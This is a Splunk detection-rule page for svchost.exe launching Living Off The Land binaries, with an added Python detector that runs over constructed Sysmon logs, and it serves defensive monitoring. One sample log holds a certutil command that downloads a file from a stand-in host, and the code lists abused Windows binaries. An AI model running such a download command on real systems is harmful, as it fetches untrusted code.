
Summary
This detection rule targets the spawning of Living Off The Land Binaries and Scripts (LOLBAS) processes by 'svchost.exe'. It uses data from Endpoint Detection and Response (EDR) systems to monitor instances where 'svchost.exe' creates child processes that correspond to known LOLBAS executables. The detection matters because attackers often abuse LOLBAS to run malicious code covertly, which can enable lateral movement, privilege escalation, or persistent access within an environment. Consequently, identifying such behavior can indicate a potential security threat that warrants investigation. The rule is implemented in Splunk and uses telemetry including Sysmon and Windows Event logs to provide comprehensive coverage of potentially malicious activity associated with 'svchost.exe'.
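The parent/child check the summary describes, written out as an added example in Python rather than the rule's own Splunk search (this is not the page's or the rule author's code). It parses constructed Sysmon Event ID 1 (process creation) records in a key=value layout, normalizes image paths to a lower-case basename, and flags any record whose parent is 'svchost.exe' and whose child is on a LOLBAS list. The LOLBAS set below is an assumed illustrative subset; the rule's actual list is not shown on the page, and the log lines are constructed, not real telemetry.

```python
"""Added example: svchost.exe -> LOLBAS child-process detection over
constructed Sysmon-style process-creation events (not the rule's own code)."""
import re
from typing import Dict, List

# Assumed illustrative subset of LOLBAS executables (the rule's real list is not on the page).
LOLBAS_IMAGES = {
    "regsvr32.exe", "rundll32.exe", "mshta.exe", "certutil.exe",
    "cscript.exe", "wscript.exe", "msiexec.exe", "bitsadmin.exe",
}

# Constructed sample events in a Sysmon-like key=value layout. Values containing
# spaces are quoted, as they would be in many key=value exports.
SAMPLE_LOGS = [
    # 1) svchost.exe spawning rundll32.exe: should fire
    r'EventCode=1 Computer=WS01 ParentImage=C:\Windows\System32\svchost.exe '
    r'Image=C:\Windows\System32\rundll32.exe CommandLine="rundll32.exe C:\Users\Public\x.dll,Run" '
    r'User="NT AUTHORITY\SYSTEM"',
    # 2) svchost.exe spawning another svchost.exe: not a LOLBAS child, should not fire
    r'EventCode=1 Computer=WS01 ParentImage=C:\Windows\System32\services.exe '
    r'Image=C:\Windows\System32\svchost.exe CommandLine="svchost.exe -k netsvcs" User="NT AUTHORITY\SYSTEM"',
    # 3) explorer.exe spawning rundll32.exe: parent is not svchost.exe, should not fire
    r'EventCode=1 Computer=WS02 ParentImage=C:\Windows\explorer.exe '
    r'Image=C:\Windows\System32\rundll32.exe CommandLine="rundll32.exe shell32.dll,Control_RunDLL" User="WS02\alice"',
    # 4) mixed-case path and SysWOW64 location: normalization must still match
    r'EventCode=1 Computer=WS03 ParentImage=C:\WINDOWS\System32\SVCHOST.EXE '
    r'Image=C:\Windows\SysWOW64\CertUtil.EXE CommandLine="certutil -urlcache -split -f http://example.invalid/a a.txt" '
    r'User="NT AUTHORITY\SYSTEM"',
    # 5) a network-connection event (EventCode 3) with the same images: wrong event type, should not fire
    r'EventCode=3 Computer=WS03 ParentImage=C:\Windows\System32\svchost.exe '
    r'Image=C:\Windows\System32\rundll32.exe DestinationIp=10.0.0.5 User="NT AUTHORITY\SYSTEM"',
]

_KV_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')


def parse_event(line: str) -> Dict[str, str]:
    """Split a key=value line into a dict, stripping quotes from quoted values."""
    return {key: value.strip('"') for key, value in _KV_RE.findall(line)}


def image_basename(path: str) -> str:
    """Return the lower-cased file name of an image path (handles \\ and / separators)."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def is_svchost_spawning_lolbas(event: Dict[str, str]) -> bool:
    """True when a process-creation event has svchost.exe as parent and a LOLBAS child."""
    if event.get("EventCode") != "1":          # only Sysmon process-creation events
        return False
    parent = image_basename(event.get("ParentImage", ""))
    child = image_basename(event.get("Image", ""))
    return parent == "svchost.exe" and child in LOLBAS_IMAGES


def detect(lines: List[str]) -> List[Dict[str, str]]:
    """Run the check over raw log lines and return one finding per matching event."""
    findings = []
    for line in lines:
        event = parse_event(line)
        if is_svchost_spawning_lolbas(event):
            findings.append({
                "host": event.get("Computer", ""),
                "parent": image_basename(event["ParentImage"]),
                "child": image_basename(event["Image"]),
                "command_line": event.get("CommandLine", ""),
                "user": event.get("User", ""),
            })
    return findings


if __name__ == "__main__":
    for finding in detect(SAMPLE_LOGS):
        print(f'{finding["host"]}: {finding["parent"]} -> {finding["child"]} [{finding["command_line"]}]')
```

Running the block prints the two matching events (rundll32.exe on WS01 and certutil.exe on WS03). Note that 'svchost.exe' hosts the Task Scheduler service, so scheduled tasks (the T1053.005 mapping on this page) legitimately run under it; the command line and user fields carried in each finding are what an analyst would use to separate a known task from an unexpected LOLBAS launch.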
Categories
- Endpoint
- Windows
- Infrastructure
Data Sources
- Windows Registry
- Image
- Process
ATT&CK Techniques
- T1053
- T1053.005
Created: 2024-11-13